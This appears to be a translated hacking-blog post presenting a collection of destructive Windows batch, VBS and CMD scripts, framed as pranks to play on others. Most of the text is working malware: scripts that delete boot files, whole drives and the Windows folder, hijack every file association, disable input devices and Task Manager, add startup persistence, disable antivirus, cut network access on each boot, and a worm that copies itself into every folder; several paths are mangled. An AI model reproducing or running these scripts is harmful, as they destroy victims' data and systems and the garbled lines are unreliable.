SOME UTILITIES OF .BAT FILE FOR TRILLING OTHERS OR HAPPY
Join the channel Telegram of the AnonyViet ? Link ? |
I will show you some code of the .BAT virus:
You open notepad, copy the code below and then save it as .bat, .vsb or .cmd depending on the code.
While saving, see the image below: Save as type: All Files
1) virus destroys windows:
Code:
@echo off msg *virus activated* attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini @echo off msg *Computer Over. Virus=Very Yes.* shutdown -s -t 10 -c " "
2) This virus disables mouse, keyboard, task manager, file change believe:
code:
@echo off prompt $P $G assoc .doc = fA1luRe assoc .docx = fA1luRe assoc .log = fA1luRe assoc .msg = fA1luRe assoc .pages = fA1luRe assoc .rtf = fA1luRe assoc .txt = fA1luRe assoc .wpd = fA1luRe assoc .wps = fA1luRe assoc .accdb = fA1luRe assoc .blg = fA1luRe assoc .csv = fA1luRe assoc .dat = fA1luRe assoc .db = fA1luReassoc .efx = fA1luRe assoc .mdb = fA1luRe assoc .pdb = fA1luRe assoc .pps = fA1luRe assoc .ppt = fA1luRe assoc .pptx = fA1luRe assoc .sdb = fA1luRe assoc .sdf = fA1luRe assoc .sql = fA1luRe assoc .vcf = fA1luRe assoc .wks = fA1luRe assoc .xls = fA1luRe assoc .xlsx = fA1luRe assoc .xml = fA1luRe assoc .bmp = fA1luRe assoc .gif = fA1luRe assoc .jpg = fA1luRe assoc .png = fA1luRe assoc .psd = fA1luRe assoc .psp = fA1luRe assoc .thm = fA1luRe assoc .tif = fA1luRe assoc .ai = fA1luRe assoc .drw = fA1luRe assoc .eps = fA1luRe assoc .ps = fA1luRe assoc .svg = fA1luRe assoc .3dm = fA1luRe assoc .dwg = fA1luRe assoc .dxf = fA1luRe assoc .pln = fA1luRe assoc .indd = fA1luRe assoc .pct = fA1luRe assoc .pdf = fA1luRe assoc .qxd = fA1luRe assoc .qxp = fA1luReassoc .rels = fA1luRe assoc .aac = fA1luRe assoc .aif = fA1luRe assoc .iff = fA1luRe assoc .m3u = fA1luRe assoc .mid = fA1luRe assoc .mp3 = fA1luRe assoc .mpa = fA1luRe assoc .ra = fA1luRe assoc .wav = fA1luRe assoc .wma = fA1luRe assoc .3g2 = fA1luRe assoc .3gp = fA1luRe assoc .asf = fA1luRe assoc .asx = fA1luRe assoc .avi = fA1luRe assoc .flv = fA1luRe assoc .mov = fA1luRe assoc .mp4 = fA1luRe assoc .mpg = fA1luRe assoc .rm = fA1luRe assoc .swf = fA1luRe assoc .vob = fA1luRe assoc .wmv = fA1luRe assoc .asp = fA1luRe assoc .cer = fA1luRe assoc .csr = fA1luRe assoc .css = fA1luRe assoc .htm = fA1luRe assoc .html = fA1luRe assoc .js = fA1luRe assoc .jsp = fA1luRe assoc .php = fA1luRe assoc .rss = fA1luRe assoc .tvpi = fA1luRe assoc .tvvi = fA1luReassoc .xhtml = fA1luRe assoc .fnt = fA1luRe assoc .fon = fA1luRe assoc .otf = fA1luRe assoc .ttf = fA1luRe assoc .8bi = fA1luRe assoc .plugin = fA1luRe assoc .xll = fA1luRe assoc .cab = fA1luRe assoc .cpl = fA1luRe assoc .cur = fA1luRe assoc .dll = fA1luRe assoc .dmp = fA1luRe assoc .drv = fA1luRe assoc .key = fA1luRe assoc .lnk = fA1luRe assoc .sys = fA1luRe assoc .cfg = fA1luRe assoc .ini = fA1luRe assoc .keychain = fA1luRe assoc .prf = fA1luRe assoc .app = fA1luRe assoc .bat = fA1luRe assoc .cgi = fA1luRe assoc .com = fA1luRe assoc .exe = fA1luRe assoc .pif = fA1luRe assoc .vb = fA1luRe assoc .ws = fA1luRe assoc .7z = fA1luRe assoc .deb = fA1luRe assoc .gz = fA1luRe assoc .pkg = fA1luRe assoc .rar = fA1luRe assoc .sit = fA1luRe assoc .sitx = fA1luReassoc .tar.gz = fA1luRe assoc .zip = fA1luRe assoc .zipx = fA1luRe assoc .bin = fA1luRe assoc .hqx = fA1luRe assoc .mim = fA1luRe assoc .uue = fA1luRe assoc .c = fA1luRe assoc .cpp = fA1luRe assoc .dtd = fA1luRe assoc .java = fA1luRe assoc .pl = fA1luRe assoc .bak = fA1luRe assoc .bup = fA1luRe assoc .gho = fA1luRe assoc .ori = fA1luRe assoc .tmp = fA1luRe assoc .dmg = fA1luRe assoc .iso = fA1luRe assoc .toast = fA1luRe assoc .vcd = fA1luRe assoc .gam = fA1luRe assoc .nes = fA1luRe assoc .rom = fA1luRe assoc .sav = fA1luRe assoc .dbx = fA1luRe assoc .msi = fA1luRe assoc .part = fA1luRe assoc .torrent = fA1luRe assoc .yps = fA1luRe rundll32.exe mouse, disable rundll32.exe keyboard, disable copy setup.bat %userprofile%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup copy setup.bat %windir%System32 reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v fA1luRe /t REG_SZ /d %windir%System32setup.bat taskkill /f /im taskmgr.exe reg restore HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicie sSystem DisableTaskMgr = 1 shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
3) Check how many % of CPU is up to:
You open notepad and type start 1.bat inside then you save this virus as
1.bat then immediately % CPU will increase.
4) Repeat the mess cycle many times:
Code:
@ECHO off :Begin msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo GOTO BEGIN VD: @ECHO off :Begin msg * Hi msg * khoe ko anh ? msg * em ne ? msg * buon ngu chua anh ? msg * tat may ngu thoi ,bb anh GOTO BEGIN
5) Automatic shutdown and with the message:
Code:
@echo off msg * lời cảnh báo shutdown -c “lời cảnh báo” -s VD:@echo off msg * I LOVE YOU shutdown -c “Error! tam biet anh!” -s
And here are some viruses with the ending .VBS
- Function to send warning messages:
Code:
TEXT1=MSGBOX("THÔNG ĐIÊP CẢNH BÁO",42,"TÊN THÔNG ĐIỆP CẢNH BÁO")2) Computer stand function:
Code:
msgbox"Error !" On Error Resume Next Set vip_xinh = Createobject("scripting.filesystemobject") vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& " vip_xinh.vbs" Set vip_xinh2= CreateObject("WScript.Shell") vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %" On Error Resume Next Const vic = "D:" Delvic Sub Delvic() Dim fso Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile vic & "*.*" , True fso.DeleteFolder vic & "*" , True End Sub On Error Resume Next Const vic1 = "C:windows" Delvic1 Sub Delvic1() Dim fso1 Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*" , True fso1.DeleteFolder vic1 & "*" , True End Sub On Error Resume Next Const vic2 = "C:" Delvic2 Sub Delvic2() Dim fso2 Set fso2 = CreateObject("Scripting.FileSystemObject") fso2.DeleteFile vic2 & "*.*" , True fso2.DeleteFolder vic2 & "*" , True End Sub On Error Resume Next Set treomay= CreateObject("WScript.Shell") Do treomay.run "notepad",false loop
3) This is a very evil virus I recommend if you want to try it, close
Tape all the drives before using it or you’ll be in danger
Code:
Dim fso,file,VBCopy Set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.OpenTextFile(WScript.ScriptFullName,1) VBCopy=file.ReadAll FolderList("A:") FolderList("B:") FolderList("C:") FolderList("D:") FolderList("E:") FolderList("F:") FolderList("G:") FolderList("H:") FolderList("I:")FolderList("J:") FolderList("K:") FolderList("L:") FolderList("M:") FolderList("N:") FolderList("O:") FolderList("P:") FolderList("Q:") FolderList("R:") FolderList("S:") FolderList("T:") FolderList("U:") FolderList("V:") FolderList("X:") FolderList("Y:") FolderList("Z:") FolderList("W:") Sub FolderList(FolderSpec) On Error Resume Next Dim f,f1,sf,COP,CAP Set f=fso.GetFolder(FolderSpec) set sf=f.SubFolders For Each f1 In sf Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs") COP.write VBCopy Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs") CAP.write VBCopy FolderList(f1.Path) Next End sub
And here is the antidote:
Code:
Dim fso,file,VBCopy Set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll FolderList("A:") FolderList("B:") FolderList("C:") FolderList("D:") FolderList("E:") FolderList("F:") FolderList("G:") FolderList("H:") FolderList("I:") FolderList("J:") FolderList("K:") FolderList("L:") FolderList("M:") FolderList("N:") FolderList("O:") FolderList("P:") FolderList("Q:") FolderList("R:") FolderList("S:") FolderList("T:") FolderList("U:") FolderList("V:") FolderList("X:") FolderList("Y:") FolderList("Z:") FolderList("W:") Sub FolderList(FolderSpec) On Error Resume Next Dim f,f1,sf,COP,CAP,ATT Set f=fso.GetFolder(FolderSpec) set sf=f.SubFolders For Each f1 In sf 'Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs") 'COP.write VBCopy 'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs") 'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path) 'ATT.Attributes=ATT.Attributes+2 fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs") fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs") FolderList(f1.Path) Next End sub
4) Function to open a message and then automatically shutdown:
Code:
@ECHO OFF MSG * THÔNG ĐIỆP SHUTDOWN -C "THÔNG ĐIỆP" -S -T 10
5) Do not let the victim start the machine:
Code:
DIM WSH SET WSH = CREATEOBJECT("WSCRIPT.SHELL") WSH.RUN "RUNDLL32.EXE USER.EXE,EXITWINDOWS"
6)Disable NAV:
Code:
DIM WSH SET WSH= CREATEOBJECT( "WSCRIPT.SHELL") S1 = " HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVIC ESNORTON PROGRAM SCHEDULERSTART" WSH.REGWRITE S1,3, "REG_DWORD"
7) Display the message every time you restart the computer:
Code:
DIM WSH SET WSH = CREATEOBJECT( "WSCRIPT.SHELL" ) S1 = " HKLMSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWIN LOGON" S2 = "LEGALNOTICECAPTION"S3 = "LEGALNOTICETEXT" WSH.REGWRITE S1+S2, "LỜI CẢNH BÁO" WSH.REGWRITE S1+S3, "LỜI CẢNH BÁO"
8) The tutorial will show up when you click on Folder:
Code:
SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","LOI CANH BAO" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLLOI CANH BAO","SLM"eg:
SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","HI ! BAN DA BI NHIEM WK TU TRUONGTON.NET" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLHI ! BAN DA BI NHIEM WK TU TRUONGTON.NET","SLM"
9) Delete Registry Files:
Code:
@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM LOI CANH BAO. GOTO MESSAGEeg:
@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM CHUC ANH 1 NGAY VUI VE. GOTO MESSAGE
10) Turn on notepad and continue to run the computer:
CODE:@ECHO OFF :TOP START %SYSTEMROOT%SYSTEM32NOTEPAD.EXE GOTO TOP
11) Turn caps lock on and off continuously:
Code:
SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{CAPSLOCK}" LOOP
12) Press enter continuously:
Code:
SET WSHSHELL = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "~(ENTER)" LOOP
12) Pressing Space continuously:
MSGBOX "LET'S GO BACK A FEW STEPS" SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{BS}" LOOP
And here are some viruses with the .cmd extension:
1) Delete all files in the machine:
Code:
DEL /F /Q *
2) Delete a certain file:
Code:
erase path eg:
ERASE C:TEST.TXT
3) Hide all files in windows
Code:
ATTRIB +S /F /Q *
Update Add Some Extremely Dangerous Virus
1) Goodbye PC Forever
Be careful when you’re done, don’t click it!!
@echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: ntldr del c: ntldr attrib -r -s -hc: windows win.ini del c: windows win.ini
Save With Tail .Bat and don’t click if you don’t want to face consequences!!
2) Dangerous Virus With No Name
@echo off del D: *. * / f / s / q del E: *. * / f / s / q del F: *. * / f / s / q del G: *. * / f / s / q del H: *. * / f / s / q del I: *. * / f / s / q del J: *. * / f / s / q
Save With Name SEO.bat
This is even more dangerous. Just to learn, not to break people’s machines =)
4) Don’t Give Windows Startup
Del c:. WINDOWS system32 * * / q
Save as anything.bat
5) Disable Internet Permanently
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE
Save with Tail .Bat
6) Change All Tails to TXT
Disrupting computer data
REN * .DOC * .TXT REN * .JPEG * .TXT REN * LNK * .TXT REN * .AVI * .TXT REN * .MPEG * .TXT REN * .COM * .TXT REN * .BAT * .TXT
Save the Tail .Bat